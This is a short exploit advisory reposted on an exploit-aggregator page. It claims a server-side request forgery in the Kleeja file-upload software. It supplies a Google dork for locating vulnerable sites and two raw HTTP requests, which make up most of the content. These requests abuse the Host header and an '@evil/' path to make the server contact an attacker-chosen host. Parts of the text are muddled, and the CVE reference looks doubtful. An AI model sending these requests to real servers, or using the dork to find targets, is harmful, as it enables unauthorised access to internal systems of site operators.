Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020090122

Below is a copy:

Upload Kleeja Server Side Request Forgery (SSRF)
# Exploit Title: Server Side Request Forgery (SSRF) in Upload Kleeja
# Google Dork: Powered by Kleeja
# Date: 21 - 07 - 2020
# Exploit Author: Saud
# Software Link: https://github.com/kleeja-official
# Version: All
# Homepage: http://kleeja.net/
# Tested on: Version 2.4
# CVE : CVE-2018-1042

evil = For Example SSRF

Example exploitation request:
-----------------------------------------------------------------------
GET /up/go.php?go=stats HTTP/1.1
Host: saud.com:[email protected]
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
-----------------------------------------------------------------------

or

-----------------------------------------------------------------------

GET @evil/ HTTP/1.1
Host: saud.com
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close





### [ Contacts: ]
[#] Telegram: @x0Saudi
[#] Twitter: @Dmaral3noz

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.